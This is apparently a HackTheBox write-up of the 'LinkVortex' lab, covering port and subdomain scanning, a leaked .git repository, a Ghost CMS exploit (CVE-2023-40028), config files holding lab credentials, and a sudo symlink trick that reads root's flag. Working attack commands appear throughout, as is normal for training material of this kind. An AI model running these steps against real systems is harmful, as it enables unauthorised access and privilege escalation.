LinkVortex

HackTheBox Easy Ghost CMS Privilege Escalation Web Security

A Ghost CMS instance with security misconfigurations leading to unauthorised access and privilege escalation. This write-up covers web application security testing and Linux privilege escalation techniques.

Overview

  • Category: Miscellaneous
  • Difficulty: Easy
  • Platform: HackTheBox
  • Release Date: 2023
  • Target IP: 10.10.11.47

Reconnaissance

Port Scanning

Nmap Scan 
# Full TCP port scan
nmap -sC -sV -T4 -p- 10.10.11.47
Port State Service Version
22/tcp Open SSH OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp Open HTTP Apache httpd

Additional Details

  • HTTP server redirects to http://linkvortex.htb/
  • SSH host keys:
    • ECDSA: 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb
    • ED25519: 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13

Web Enumeration

Directory Enumeration (Main Domain)

Gobuster Directory Scan 
gobuster dir -u http://linkvortex.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt

Subdomain Enumeration

FFUF Subdomain Scan 
ffuf -u http://linkvortex.htb/ -w /usr/share/wordlists/Custom/DNS/n0kovo_subdomains_huge.txt \
     -H "Host:FUZZ.linkvortex.htb" -mc 200 -fs 178 -o dnsresults -of md -v

Discovered Subdomains

Subdomain Status Content Length Type
dev 200 2538 text/html

Git Repository Enumeration

Found exposed Git repository at dev.linkvortex.htb/.git/

Path Status Size
/.git/301239
/.git/HEAD20041
/.git/config200201
/.git/logs/200868
/.git/index200707577

Source Code Analysis

Git Repository Investigation

Git Status 
git status

# Output:
Not currently on any branch.
Changes to be committed:
  (use "git restore --staged ..." to unstage)
        new file:   Dockerfile.ghost
        modified:   ghost/core/test/regression/api/admin/authentication.test.js

Analyzing the changes revealed:

Dockerfile Changes 
diff --git a/Dockerfile.ghost b/Dockerfile.ghost
new file mode 100644
index 0000000..50864e0
--- /dev/null
+++ b/Dockerfile.ghost
@@ -0,0 +1,16 @@
+FROM ghost:5.58.0
+
+# Copy the config
+COPY config.production.json /var/lib/ghost/config.production.json
+
+# Prevent installing packages
+RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
+
+# Wait for the db to be ready first
+COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
+COPY entry.sh /entry.sh
+RUN chmod +x /var/lib/ghost/wait-for-it.sh
+RUN chmod +x /entry.sh
+
+ENTRYPOINT ["/entry.sh"]
+CMD ["node", "current/index.js"]
Authentication Test Changes 
diff --git a/ghost/core/test/regression/api/admin/authentication.test.js b/ghost/core/test/regression/api/admin/authentication.test.js
index 2735588..e654b0e 100644
--- a/ghost/core/test/regression/api/admin/authentication.test.js
+++ b/ghost/core/test/regression/api/admin/authentication.test.js
@@ -53,7 +53,7 @@ describe('Authentication API', function () {
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';

Initial Access

Ghost CMS Exploitation

  • Vulnerability: CVE-2023-40028 (Ghost CMS v5.58)
  • Exploit Tool:
    Exploit Command 
    ./cve-2023-40028 -u  -p  -h

Configuration File Extraction

Retrieved /var/lib/ghost/config.production.json:

Ghost Configuration 
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "SMTP",
    "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
      }
    }
  },
  "spam": {
    "user_login": {
      "minWait": 1,
      "maxWait": 604800000,
      "freeRetries": 5000
    }
  }
}

SSH Access

  • Successfully authenticated as user bob using discovered credentials
  • User flag obtained

Privilege Escalation

Sudo Permissions Analysis

Sudo Permissions 
sudo -l

# Output:
User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Root Flag Extraction

Symlink Attack 
# Create symlinks
ln -s /root/root.txt /home/bob/test.txt
ln -s /home/bob/test.txt /home/bob/test.png

# Execute exploit
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/test.png

Flags

User Flag

e9e77193e25870661af3813cab24a91c

Root Flag

cdf8ecab5aace4312e2b04673c4fe73d

Key Takeaways

  1. Always check for exposed Git repositories and analyse their contents
  2. Version-specific vulnerabilities in CMS systems can be critical (Ghost CMS 5.58)
  3. Configuration files often contain valuable credentials
  4. Symlink attacks can be effective for privilege escalation when combined with sudo permissions

Tools Used

  • nmap
  • gobuster
  • ffuf
  • git
  • CVE-2023-40028 exploit
  • Basic Linux commands (ln, sudo)

References